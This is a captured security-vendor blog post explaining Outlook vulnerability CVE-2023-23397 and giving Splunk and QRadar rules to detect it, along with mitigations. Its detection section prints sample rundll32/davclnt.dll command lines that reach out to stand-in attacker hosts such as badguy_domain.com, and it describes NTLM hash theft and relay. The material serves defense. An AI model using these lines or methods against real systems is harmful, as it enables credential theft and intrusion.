www.cardinalops.com Open in urlscan Pro
2606:2c40::c73c:671e  Public Scan

Submitted URL: https://cthjm04.na1.hubspotlinks.com/Ctc/GE+113/cThJm04/VXbv1Z8Q37j_W5zYxD91zjDbrW6tdK5Q4Yn1-ZMDyKlX5knJmV3Zsc37CgHF9W911mln1gkW_wW3S...
Effective URL: https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medi...
Submission: On March 20 via manual from US — Scanned from DE

Form analysis 1 forms found in the DOM

POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7289101/e932d4e4-8e73-4e43-9aee-45272120bf6c

<form id="hsForm_e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
  action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/7289101/e932d4e4-8e73-4e43-9aee-45272120bf6c"
  class="hs-form-private hsForm_e932d4e4-8e73-4e43-9aee-45272120bf6c hs-form-e932d4e4-8e73-4e43-9aee-45272120bf6c hs-form-e932d4e4-8e73-4e43-9aee-45272120bf6c_59863ae6-1999-4c44-9fbe-c0d2857fa29a hs-form stacked"
  target="target_iframe_e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" data-instance-id="59863ae6-1999-4c44-9fbe-c0d2857fa29a" data-form-id="e932d4e4-8e73-4e43-9aee-45272120bf6c" data-portal-id="7289101" data-hs-cf-bound="true">
  <div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your First Name"
      for="firstname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>First Name</span><span class="hs-form-required">*</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="firstname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
  </div>
  <div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Last Name"
      for="lastname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Last Name</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="lastname-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="lastname" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
  </div>
  <div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Email"
      for="email-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Email</span><span class="hs-form-required">*</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="email-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
  </div>
  <div class="hs_website hs-website hs-fieldtype-text field hs-form-field"><label id="label-website-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Website"
      for="website-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Website</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><input id="website-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" name="website" placeholder="" type="text" class="hs-input" inputmode="url" value=""></div>
  </div>
  <div class="hs_comment hs-comment hs-fieldtype-textarea field hs-form-field"><label id="label-comment-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="" placeholder="Enter your Comment"
      for="comment-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482"><span>Comment</span><span class="hs-form-required">*</span></label>
    <legend class="hs-field-desc" style="display: none;"></legend>
    <div class="input"><textarea id="comment-e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" class="hs-input hs-fieldtype-textarea" name="comment" required="" placeholder=""></textarea></div>
  </div>
  <div>
    <div class="hs-richtext hs-main-font-element">
      <p><span style="color: #000000;">View our <a href="http://www-cardinalops-com.sandbox.hs-sites.com/privacy-policy" rel="noopener" target="_blank" style="color: #000000;">privacy policy</a>. By clicking submit you consent to allow CardinalOps to
          store and process the personal information submitted to provide you the content requested.</span></p>
    </div>
  </div>
  <div class="hs_recaptcha hs-recaptcha field hs-form-field">
    <div class="input">
      <div class="grecaptcha-badge" data-style="inline" style="width: 256px; height: 60px; box-shadow: gray 0px 0px 5px;">
        <div class="grecaptcha-logo"><iframe title="reCAPTCHA"
            src="https://www.google.com/recaptcha/enterprise/anchor?ar=1&amp;k=6Ld_ad8ZAAAAAAqr0ePo1dUfAi0m4KPkCMQYwPPm&amp;co=aHR0cHM6Ly93d3cuY2FyZGluYWxvcHMuY29tOjQ0Mw..&amp;hl=en&amp;v=Trd6gj1dhC_fx0ma_AWHc1me&amp;size=invisible&amp;badge=inline&amp;cb=21331iv07zkm"
            width="256" height="60" role="presentation" name="a-q0mi4bk7aj4n" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"
            data-lf-form-tracking-inspected-yegkb8lpvym8ep3z="true" data-lf-yt-playback-inspected-yegkb8lpvym8ep3z="true" data-lf-vimeo-playback-inspected-yegkb8lpvym8ep3z="true"></iframe></div>
        <div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
          style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
      </div><iframe style="display: none;" data-lf-form-tracking-inspected-yegkb8lpvym8ep3z="true" data-lf-yt-playback-inspected-yegkb8lpvym8ep3z="true" data-lf-vimeo-playback-inspected-yegkb8lpvym8ep3z="true"></iframe>
    </div><input type="hidden" name="g-recaptcha-response" id="hs-recaptcha-response" value="">
  </div>
  <div class="hs_submit hs-submit">
    <div class="hs-field-desc" style="display: none;"></div>
    <div class="actions"><input type="submit" class="hs-button primary" value="Submit Comment"></div>
  </div><input name="hs_context" type="hidden"
    value="{&quot;embedAtTimestamp&quot;:&quot;1679350614052&quot;,&quot;formDefinitionUpdatedAt&quot;:&quot;1675875271676&quot;,&quot;userAgent&quot;:&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.64 Safari/537.36&quot;,&quot;pageTitle&quot;:&quot;Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar&quot;,&quot;pageUrl&quot;:&quot;https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medium=email&amp;_hsmi=251000918&amp;_hsenc=p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8&amp;utm_content=251000918&amp;utm_source=hs_email&quot;,&quot;pageId&quot;:&quot;107207374881&quot;,&quot;urlParams&quot;:{&quot;utm_medium&quot;:&quot;email&quot;,&quot;_hsmi&quot;:&quot;251000918&quot;,&quot;_hsenc&quot;:&quot;p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8&quot;,&quot;utm_content&quot;:&quot;251000918&quot;,&quot;utm_source&quot;:&quot;hs_email&quot;},&quot;isHubSpotCmsGeneratedPage&quot;:true,&quot;canonicalUrl&quot;:&quot;https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;hutk&quot;:&quot;1165914497de9ed72a87c531dd60f182&quot;,&quot;__hsfp&quot;:1413633234,&quot;__hssc&quot;:&quot;190491124.1.1679350614751&quot;,&quot;__hstc&quot;:&quot;190491124.1165914497de9ed72a87c531dd60f182.1679350614751.1679350614751.1679350614751.1&quot;,&quot;formTarget&quot;:&quot;#hs_form_target_e932d4e4-8e73-4e43-9aee-45272120bf6c&quot;,&quot;formInstanceId&quot;:&quot;8482&quot;,&quot;pageName&quot;:&quot;Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar&quot;,&quot;locale&quot;:&quot;en&quot;,&quot;timestamp&quot;:1679350614758,&quot;originalEmbedContext&quot;:{&quot;portalId&quot;:&quot;7289101&quot;,&quot;formId&quot;:&quot;e932d4e4-8e73-4e43-9aee-45272120bf6c&quot;,&quot;region&quot;:&quot;na1&quot;,&quot;target&quot;:&quot;#hs_form_target_e932d4e4-8e73-4e43-9aee-45272120bf6c&quot;,&quot;isBuilder&quot;:false,&quot;isTestPage&quot;:false,&quot;formInstanceId&quot;:&quot;8482&quot;,&quot;formsBaseUrl&quot;:&quot;/_hcms/forms&quot;,&quot;css&quot;:&quot;&quot;,&quot;submitButtonClass&quot;:&quot;hs-button primary&quot;,&quot;isMobileResponsive&quot;:true,&quot;pageName&quot;:&quot;Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar&quot;,&quot;pageId&quot;:&quot;107207374881&quot;,&quot;contentType&quot;:&quot;blog-post&quot;,&quot;isCMSModuleEmbed&quot;:true,&quot;type&quot;:&quot;BLOG_COMMENT&quot;},&quot;correlationId&quot;:&quot;59863ae6-1999-4c44-9fbe-c0d2857fa29a&quot;,&quot;renderedFieldsIds&quot;:[&quot;firstname&quot;,&quot;lastname&quot;,&quot;email&quot;,&quot;website&quot;,&quot;comment&quot;],&quot;captchaStatus&quot;:&quot;LOADED&quot;,&quot;emailResubscribeStatus&quot;:&quot;NOT_APPLICABLE&quot;,&quot;isInsideCrossOriginFrame&quot;:false,&quot;source&quot;:&quot;forms-embed-1.2802&quot;,&quot;sourceName&quot;:&quot;forms-embed&quot;,&quot;sourceVersion&quot;:&quot;1.2802&quot;,&quot;sourceVersionMajor&quot;:&quot;1&quot;,&quot;sourceVersionMinor&quot;:&quot;2802&quot;,&quot;_debug_allPageIds&quot;:{&quot;embedContextPageId&quot;:&quot;107207374881&quot;,&quot;analyticsPageId&quot;:&quot;107207374881&quot;,&quot;pageContextPageId&quot;:&quot;107207374881&quot;},&quot;_debug_embedLogLines&quot;:[{&quot;clientTimestamp&quot;:1679350614119,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved customer callbacks used on embed context: [\&quot;getExtraMetaDataBeforeSubmit\&quot;]&quot;},{&quot;clientTimestamp&quot;:1679350614119,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved pageContext values which may be overriden by the embed context: {\&quot;pageTitle\&quot;:\&quot;Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM QRadar\&quot;,\&quot;pageUrl\&quot;:\&quot;https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar?utm_medium=email&amp;_hsmi=251000918&amp;_hsenc=p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8&amp;utm_content=251000918&amp;utm_source=hs_email\&quot;,\&quot;userAgent\&quot;:\&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.64 Safari/537.36\&quot;,\&quot;urlParams\&quot;:{\&quot;utm_medium\&quot;:\&quot;email\&quot;,\&quot;_hsmi\&quot;:\&quot;251000918\&quot;,\&quot;_hsenc\&quot;:\&quot;p2ANqtz--x0szw68AfHFSQ0QILN-_8byNJLWet_ySKj5Fef9MaAYw1GP2RZIC3GwCZe-tQywj8LogBiSnbHoaUEDeccvPJyv9Mn1IFY_jB1daWPnIQ_TBelI8\&quot;,\&quot;utm_content\&quot;:\&quot;251000918\&quot;,\&quot;utm_source\&quot;:\&quot;hs_email\&quot;},\&quot;pageId\&quot;:\&quot;107207374881\&quot;,\&quot;isHubSpotCmsGeneratedPage\&quot;:true}&quot;},{&quot;clientTimestamp&quot;:1679350614122,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved countryCode property from normalized embed definition response: \&quot;DE\&quot;&quot;},{&quot;clientTimestamp&quot;:1679350614755,&quot;level&quot;:&quot;INFO&quot;,&quot;message&quot;:&quot;Retrieved analytics values from API response which may be overriden by the embed context: {\&quot;hutk\&quot;:\&quot;1165914497de9ed72a87c531dd60f182\&quot;,\&quot;canonicalUrl\&quot;:\&quot;https://www.cardinalops.com/en/resources/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar\&quot;,\&quot;contentType\&quot;:\&quot;blog-post\&quot;,\&quot;pageId\&quot;:\&quot;107207374881\&quot;}&quot;}]}"><iframe
    name="target_iframe_e932d4e4-8e73-4e43-9aee-45272120bf6c_8482" data-lf-form-tracking-inspected-yegkb8lpvym8ep3z="true" data-lf-yt-playback-inspected-yegkb8lpvym8ep3z="true" data-lf-vimeo-playback-inspected-yegkb8lpvym8ep3z="true"
    style="display: none;"></iframe>
</form>

Text Content

×

This website stores cookies on your computer. These cookies are used to collect
information about how you interact with our website and allow us to remember
you. We use this information in order to improve and customize your browsing
experience and for analytics and metrics about our visitors both on this website
and other media. To find out more about the cookies we use, see our Privacy
Policy

If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.

Accept Decline
 * Home
 * Platform
 * Resources
   * CardinalOps in the News
   * White Papers
   * Webinars & Events
   * Blog
   * Free ATT&CK Assessment
 * Company
   * About Us
   * Careers
 * Request A Demo




DETECTING MICROSOFT OUTLOOK VULNERABILITY CVE-2023-23397 IN SPLUNK AND IBM
QRADAR

Posted by Tamir Oren Bar-Hai and Phil Neray on March 20, 2023


SUMMARY

Discovered by the Ukrainian CERT and attributed to APT28 (aka Fancy Bear or
Strontium, the Russian GRU threat actor), CVE-2023-23397 is being actively
exploited in targeted attacks against government, transportation, energy, and
military sectors in Europe. 

With a CVSS rating of 9.8 – due to its elevation of privileges and ease of
exploitation – it affects all versions of Outlook for Windows and is
particularly serious because it steals credentials before the user has even
opened a specially-crafted email. 

Attackers can then use the stolen credential to move laterally within the
network in order to gather more information and compromise crown-jewel assets. 

It's also interesting that this attack is a variation of pass-the-hash (PtH)
which has been around since the late 90s.

This blog post includes detection rules for Splunk and IBM QRadar, as well as a
detailed technical description of the vulnerability and how it can be exploited.

If you’re currently using the CardinalOps detection posture management platform,
these rules are now being delivered to your portals. 

As usual, the rules delivered to CardinalOps users are auto-customized to your
environment (indexes, naming conventions, etc.). This enables you to quickly
review, automatically test, and push them to your SIEM – via its native API –
from the CardinalOps platform.

 

This blog post describes:

 * Relevant MITRE techniques for CVE-2023-23397
 * Splunk and IBM QRadar detections for CVE-2023-23397
 * How CVE-2023-23397 works
 * Technical details for CVE-2023-23397
 * How to detect CVE-2023-23397
 * Other mitigations for CVE-2023-23397


RELEVANT MITRE TECHNIQUES FOR CVE-2023-23397

Exploitation for Privilege Escalation (T1068)

Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)

Forced Authentication (T1187)

Exploitation for Credential Access (T1212)

 

Post-Exploitation

OS Credential Dumping: LSASS Memory (T1003.001)

Use Alternate Authentication Material (T1550)


 


DETECTIONS FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

These rules will alert when a rundll32.exe uses webdav to access a public IP
address and in the same time range that an NTLM authentication outbound event is
registered with the same public IP address as the destination machine.

 


SPLUNK DETECTION RULES FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688
New_Process_Name = *rundll32.exe* Process_Command_Line = *davclnt.dll* | rex
field=Process_Command_Line "DavSetCookie \s*(?<IP_Address>\d+\.\d+\.\d+\.\d+)" 
| search (IP_Address!="10.0.0.0/8" AND IP_Address!="192.168.0.0/16" AND
IP_Address!="172.16.0.0/12") 

index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001| rex
field=target_server “\s*(?<IP_Address>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})” |
search (IP_Address!=“10.0.0.0/8" AND IP_Address!=“192.168.0.0/16” AND
IP_Address!=“172.16.0.0/12")

 


SPLUNK CORRELATION SEARCH FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

search (index={your_index} sourcetype={your_NTLM_audit_sourcetype}
EventCode=8001| rex field=target_server
"\s*(?<IP_Address_1>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" 

| search (IP_Address_1!="10.0.0.0/8" AND IP_Address_1!="192.168.0.0/16" AND
IP_Address_1!="172.16.0.0/12")) OR (index={your_index}
sourcetype={your_4688_sourcetype} EventCode=4688 New_Process_Name =
*rundll32.exe* Process_Command_Line = *davclnt.dll* | rex
field=Process_Command_Line "DavSetCookie
\s*(?<IP_Address_2>\d+\.\d+\.\d+\.\d+)" 

 | search (IP_Address_2!="10.0.0.0/8" AND IP_Address_2!="192.168.0.0/16" AND
IP_Address_2!="172.16.0.0/12")) 

 | fillnull  IP_Address_1 IP_Address_2 | eval
IP=case('IP_Address_1'!="0",'IP_Address_1, 'IP_Address_2'!="0",'IP_Address_2)

 | stats dc(EventCode) as EventCode_count count by IP | where EventCode_count >
1

Note: Time range can be set using the Splunk search console.

 


IBM QRADAR DETECTION RULE FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

and when the event(s) were detected by one or more of Microsoft Windows Security
Event Log

and when the event matches EventID (custom) is any of 4688

and when the event matches ProcessName (custom) is any of rundll32.exe

and when the event matches Process CommandLine (custom) contains any of
davclnt.dll

and when the event matches Process CommandLine (custom) matches any of
expressions ((?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(?:\.(?!$)|$)){4}

 


HOW CVE-2023-23397 WORKS

On March 14th, 2023, A serious vulnerability affecting Microsoft Outlook was
patched by Microsoft.

This vulnerability has existed in multiple versions for more than a decade. The
affected versions are Outlook for Windows 2013 up to 2019 including the
Microsoft 365 (Office 365) versions. Older versions could also be vulnerable but
are not tested or supported. 

TL;DR – Adversary sending an email with the affected properties will trigger an
SMB outbound connection, causing your machine to send out your NTLM hash (your
encrypted password along with your username in clear text).

Not to be confused with NT-HASH which is the one used in Pass-the–Hash (PtH)
attacks. This NTLM hash contains an encrypted form of your password and will
require the adversary to bruteforce this encrypted credential before gaining
access to your clear text password.

The time for the bruteforce attack to succeed is dependent on your password
length and complexity (can range from seconds to years).

Of course there are other methods that can speed up the guessing process (e.g.,
Hashcat permutations) so we need to act quickly to prevent and detect this
vulnerability exploitation attempts.

Another approach to exploit this vulnerability is to relay the NTLM packets to a
target server or workstation.

Think of the IT admin using an unpatched Outlook version causing their machine
to send out an NTLM packet. This packet will be captured by the adversary and
relayed to another machine on the network, say the HR or Finance department head
(or someone in DevOps). Now those machines have accepted the IT admin
credentials to login into their machine. Any command can then be executed by the
adversary, on behalf of the IT admin.

Getting Creds via NTLMv2 | 0xdf hacks stuff

Of course, for this to occur the adversary needs to have established a foothold
on your network, unless you allow outbound and inbound SMB traffic from the
internet (we never allow that, right?).

To summarize, we have two outcomes from the exploitation of this Outlook
vulnerability: A possible password compromise and access to remote machines. 


 


TECHNICAL DETAILS FOR CVE-2023-23397

Let's dive into more details:

 * The Outlook client automatically parses and executes crafted messages
   containing attributes controlling the MAPI properties allowing to set
   “reminder notification” sound file location. 
 * The execution is performed silently, without any indication to the end user. 
 * The crafted messages can be a shared Outlook task or a calendar invite type
   of a message.
 * The specific MAPI properties are PidLidReminderFileParameter  and
   PidLidReminderOverride.
 * Once these properties are set and the PidLidReminderFileParameter is pointing
   to an adversary’s controlled machine - this is the culprit and that is the
   reason we are reading this article 🙂.

The processing of the path to the reminder sound file location is mostly
triggered by Exchange based systems (on-prem and cloud).

Even Hotmail seems to do the same - Will Dormann on Twitter: "So, all of this
wondering about how to send a "rich" calendar invite over SMTP is moot. The
actual exploit for CVE-2023-23397 is an IPM.Task item with 0x851F
(PidLidReminderFileParameter) set. This is just fine as a TNEF attachment over
SMTP. https://t.co/yGSiR4B6wh https://t.co/7GIvb6zGlA" / Twitter

Once the Outlook client is able to process the malformed mail item, the outbound
SMB packet is sent, without any notification or user interaction. 

It seems that even after applying the patch, Microsoft allows the reminder sound
file to be loaded by pointing to a hostname. This can be leveraged internally on
the network or can be used to access the public IP, if the hosts file is
manipulated.  Will Dormann on Twitter: "So, all of this wondering about how to
send a "rich" calendar invite over SMTP is moot. The actual exploit for
CVE-2023-23397 is an IPM.Task item with 0x851F (PidLidReminderFileParameter)
set. This is just fine as a TNEF attachment over SMTP. https://t.co/yGSiR4B6wh
https://t.co/7GIvb6zGlA" / Twitter

Another nice “feature” of this vulnerability is the ability to trigger legacy
capabilities in Windows that if not managed, can leak credentials. For example,
by using a non-existent host name in the reminder file path, the adversary can
cause LLMNR and NBT-NS broadcast and multicast requests. See
https://attack.mitre.org/techniques/T1557/001/ for details. 


 


HOW TO DETECT CVE-2023-23397

The process command line on the victim’s machine can be identified by the
following format:

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie [ip address or a
domain name] http://[ip address or a domain name]/[path to the a file or a
directory]

 

For example:

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 35.180.139.74
http://35.180.139.74/file/sound.wav

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie badguy
http://badguy_domain.com/file/sound.wav

 

The format can also be found to be shorter: 

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie
http://35.180.139.74/file/sound.wav

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 
http://badguy_domain.com/file/sound.wav

 

Even though the command line is stating http protocol - the Windows machine will
send an SMB packet on port 445. 

We need to detect when a DavSetCookie function is accessing a public IP address.
This can be normal for a home PC but might be questionable for an enterprise
machine. This detection can point out public IP addresses your enterprise
clients are using and are trustworthy but anything other than the known good
should trigger a deeper investigation. 

If we are on the topic of identifying DLL functions we should also remember to
have detections to identify the use of a DLL function using the function’s
ordinal value. In this case (not tested but typically works), the command could
potentially be:

rundll32 c:\windows\system32\davclnt.dll,#6 35.180.139.74
http://35.180.139.74/share

 

For more details, see:

https://research.splunk.com/endpoint/6c135f8d-5e60-454e-80b7-c56eed739833/

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md#atomic-test-11---rundll32-with-ordinal-value

yara-rulz/Outlook_CVE_2023_23397.yara at main · elceef/yara-rulz (github.com)

 

Another powerful detection source can be leveraged by enabling “Outbound NTLM
traffic to remote servers” in the security options. This enables the audit of
outbound NTLM authentication traffic so you can identify where your desktops and
servers are sending their NTLM hashes. 

 

Example event log:

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-DUR-001_pic2.png

https://www.windows-security.org/c526612a90004088b250158bc5e7dc2d/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote


 


OTHER MITIGATIONS FOR CVE-2023-23397

Microsoft suggests to block outbound port 445 and make use of the Protected
Users Active Directory group. This is good advice except “Protected Users” is
usually not a good fit for the standard user. Test wisely. 

We suggest also reviewing your security posture to make sure other vectors are
not making it easy for the adversary.  

 1. Ensure your machines are configured to send out only NTLM-v2 and not one of
    the weaker options. Specifically: configure “Send NTLMv2 responses only.
    Refuse LM & NTLM.”  For more information see 
    https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
 2. The fact that we can trigger any outlook user to send his NTLM hash to any
    destination can affect home users (think the C-level or IT admins) – even if
    the adversary cracks the NTLM – the adversary still needs to get lucky and
    find an interface without MFA. So make sure your home users use MFA for any
    interface they use from their home PC!
 3. To mitigate the NTLM relay attack vector: ensure SMB server signing is
    enabled on workstations and servers. Configure workstations to block inbound
    SMB(port 445) and enable exceptions to specific machines allowed to access
    workstation over the network using port 445.

Topics: News, Featured, Threat Management, Security Engineering, MITRE ATT&CK,
SecOps, Detection Posture Management

First Name*

Last Name

Email*

Website

Comment*


View our privacy policy. By clicking submit you consent to allow CardinalOps to
store and process the personal information submitted to provide you the content
requested.





WHAT’S NEW


RECENT POSTS

 * Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM
   QRadar
 * CardinalOps CEO Discusses the State of Today's SOC Teams on Silo Busting
   Podcast
 * State of Identity Podcast Episode 320: Detection Posture Management
 * CardinalOps Named as Winner in 2023 Cybersecurity Excellence Awards for
   Detection Posture Management
 * How Detection Posture Management Can Help CISOs Track the Right Metrics


FEATURED

 * Detecting Microsoft Outlook Vulnerability CVE-2023-23397 in Splunk and IBM
   QRadar
 * CardinalOps CEO Discusses the State of Today's SOC Teams on Silo Busting
   Podcast
 * State of Identity Podcast Episode 320: Detection Posture Management
 * CardinalOps Named as Winner in 2023 Cybersecurity Excellence Awards for
   Detection Posture Management
 * How Detection Posture Management Can Help CISOs Track the Right Metrics


POSTS BY TAG

 * SecOps
 * Threat Management
 * Featured
 * Security Engineering
 * MITRE ATT&CK
 * News
 * venture capital
 * Cloud
 * Detection Posture Management


POSTS BY TAG

 * SecOps (24)
 * Threat Management (23)
 * Featured (20)
 * Security Engineering (19)
 * MITRE ATT&CK (18)
 * News (13)
 * venture capital (3)
 * Cloud (2)
 * Detection Posture Management (2)

See all
   
 * 

© 2023 CardinalOps    |   Privacy Policy   |   Terms of Use